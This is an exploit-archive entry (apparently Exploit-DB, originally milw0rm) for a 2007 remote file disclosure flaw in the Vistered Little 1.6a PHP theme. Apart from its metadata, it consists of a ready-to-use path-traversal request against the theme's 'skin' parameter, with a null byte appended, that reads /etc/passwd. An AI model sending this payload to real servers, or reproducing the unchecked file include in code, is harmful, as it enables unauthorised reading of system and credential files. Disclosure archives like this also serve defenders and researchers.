Vistered Little 1.6a - 'skin' Remote File Disclosure

EDB-ID:

3999


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-05-28


# Vistered Little 1.6a Remote File Disclosure Vulnerability
# Page Script : http://windyroad.org/vistered-little-1.6a.zip
# Exploit : [path]/skins/common.css.php?skin=../../../../../../etc/passwd%00
# Discovered by: Mahmood_ali

# milw0rm.com [2007-05-28]